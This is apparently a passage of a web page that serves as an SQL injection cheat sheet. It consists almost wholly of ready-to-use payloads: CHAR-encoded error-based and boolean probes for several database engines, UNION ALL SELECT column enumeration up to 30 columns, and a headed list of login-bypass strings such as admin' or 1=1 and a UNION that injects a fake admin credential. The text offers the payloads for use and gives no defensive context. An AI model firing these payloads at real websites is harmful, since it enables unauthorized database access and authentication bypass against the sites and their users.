5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))\u2013<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))\u2013<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))\u2013<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))\u2013<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))\u2013<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))\u2013<br \/>\nUNION ALL SELECT NULL#<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))#<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))#<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))#<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))#<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))#<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))#<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))#<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))#<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))#<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))#<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))#<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))#<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))#<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))#<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))#<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))#<br \/>\nUNION ALL SELECT NULL<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))<br \/>\nAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))<br \/>\nAND 5650=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (5650=5650) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))<br \/>\nAND 3516=CAST((CHR(113)||CHR(106)||CHR(122)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3516=3516) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(106)||CHR(107)||CHR(113)) AS NUMERIC)<br \/>\nAND (SELECT 4523 FROM(SELECT COUNT(*),CONCAT(0x716a7a6a71,(SELECT (ELT(4523=4523,1))),0x71706a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)<br \/>\nUNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(110)+CHAR(106)+CHAR(99)+CHAR(73)+CHAR(66)+CHAR(109)+CHAR(119)+CHAR(81)+CHAR(108)+CHAR(88)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113),NULL\u2013<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14,15<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019\u2013<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2\u2013<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3\u2013<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4\u2013<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5\u2013<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6\u2013<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7\u2013<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8\u2013<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9\u2013<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10\u2013<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11\u2013<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12\u2013<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13\u2013<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14\u2013<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14,15\u2013<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16\u2013<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17\u2013<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18\u2013<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19\u2013<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20\u2013<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21\u2013<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22\u2013<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23\u2013<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24\u2013<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25\u2013<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26\u2013<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27\u2013<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28\u2013<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29\u2013<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30\u2013<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019#<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2#<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3#<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4#<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5#<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6#<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7#<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8#<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9#<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10#<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11#<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12#<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13#<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14#<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14,15#<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#<br \/>\nUNION ALL SELECT \u2018INJ\u2019||\u2019ECT\u2019||\u2019XXX\u2019,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#<\/p>\n<h3>SQL Injection Cheatsheet Auth Bypass Payloads<\/h3>\n<p>\u2018-\u2018<br \/>\n\u2018 \u2018<br \/>\n\u2018&amp;\u2019<br \/>\n\u2018^\u2019<br \/>\n\u2018*\u2019<br \/>\n\u2018 or \u201d-\u2018<br \/>\n\u2018 or \u201d \u2018<br \/>\n\u2018 or \u201d&amp;\u2019<br \/>\n\u2018 or \u201d^\u2019<br \/>\n\u2018 or \u201d*\u2019<br \/>\n\u201c-\u201d<br \/>\n\u201d \u201d<br \/>\n\u201c&amp;\u201d<br \/>\n\u201c^\u201d<br \/>\n\u201c*\u201d<br \/>\n\u201d or \u201c\u201d-\u201d<br \/>\n\u201d or \u201c\u201d \u201d<br \/>\n\u201d or \u201c\u201d&amp;\u201d<br \/>\n\u201d or \u201c\u201d^\u201d<br \/>\n\u201d or \u201c\u201d*\u201d<br \/>\nor true\u2013<br \/>\n\u201d or true\u2013<br \/>\n\u2018 or true\u2013<br \/>\n\u201c) or true\u2013<br \/>\n\u2018) or true\u2013<br \/>\n\u2018 or \u2018x\u2019=\u2019x<br \/>\n\u2018) or (\u2018x\u2019)=(\u2018x<br \/>\n\u2018)) or ((\u2018x\u2019))=((\u2018x<br \/>\n\u201d or \u201cx\u201d=\u201dx<br \/>\n\u201c) or (\u201cx\u201d)=(\u201cx<br \/>\n\u201c)) or ((\u201cx\u201d))=((\u201cx<br \/>\nor 1=1<br \/>\nor 1=1\u2013<br \/>\nor 1=1#<br \/>\nor 1=1\/*<br \/>\nadmin\u2019 \u2014<br \/>\nadmin\u2019 #<br \/>\nadmin\u2019\/*<br \/>\nadmin\u2019 or \u20181\u2019=\u20191<br \/>\nadmin\u2019 or \u20181\u2019=\u20191\u2032\u2013<br \/>\nadmin\u2019 or \u20181\u2019=\u20191\u2019#<br \/>\nadmin\u2019 or \u20181\u2019=\u20191\u2019\/*<br \/>\nadmin\u2019or 1=1 or \u201d=\u2019<br \/>\nadmin\u2019 or 1=1<br \/>\nadmin\u2019 or 1=1\u2013<br \/>\nadmin\u2019 or 1=1#<br \/>\nadmin\u2019 or 1=1\/*<br \/>\nadmin\u2019) or (\u20181\u2019=\u20191<br \/>\nadmin\u2019) or (\u20181\u2019=\u20191\u2032\u2013<br \/>\nadmin\u2019) or (\u20181\u2019=\u20191\u2019#<br \/>\nadmin\u2019) or (\u20181\u2019=\u20191\u2019\/*<br \/>\nadmin\u2019) or \u20181\u2019=\u20191<br \/>\nadmin\u2019) or \u20181\u2019=\u20191\u2032\u2013<br \/>\nadmin\u2019) or \u20181\u2019=\u20191\u2019#<br \/>\nadmin\u2019) or \u20181\u2019=\u20191\u2019\/*<br \/>\n1234 \u2018 AND 1=0 UNION ALL SELECT \u2018admin\u2019, \u201981dc9bdb52d04dc20036dbd8313ed055<br \/>\nadmin\u201d \u2014<br \/>\nadmin\u201d #<br \/>\nadmin\u201d\/*<br \/>\nadmin\u201d or \u201c1\u201d=\u201d1<br \/>\nadmin\u201d or \u201c1\u201d=\u201d1\u2033\u2013<br \/>\nadmin\u201d or \u201c1\u201d=\u201d1\u2033#<br \/>\nadmin\u201d or \u201c1\u201d=\u201d1\u2033\/*<br \/>\nadmin\u201dor 1=1 or \u201c\u201d=\u201d<br \/>\nadmin\u201d or 1=1<br \/>\nadmin\u201d or 1=1\u2013<br \/>\nadmin\u201d or 1=1#<br \/>\nadmin\u201d or 1=1\/*<br \/>\nadmin\u201d) or (\u201c1\u2033=\u201d1<br \/>\nadmin\u201d) or (\u201c1\u2033=\u201d1\u2033\u2013<br \/>\nadmin\u201d) or (\u201c1\u2033=\u201d1\u2033#<br \/>\nadmin\u201d) or (\u201c1\u2033=\u201d1\u2033\/*<br \/>\nadmin\u201d) or \u201c1\u201d=\u201d1<br \/>\nadmin\u201d) or \u201c1\u201d=\u201d1\u2033\u2013<br \/>\nadmin\u201d) or \u201c1\u201d=\u201d1\u2033#<br \/>\nadmin\u201d) or \u201c1\u201d=\u201d1\u2033\/*<br \/>\n1234 \u201d AND 1=0 UNION ALL SELECT \u201cadmin\u201d, \u201c81dc9bdb52d04dc20036dbd8313ed055<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>You May Also Like Our 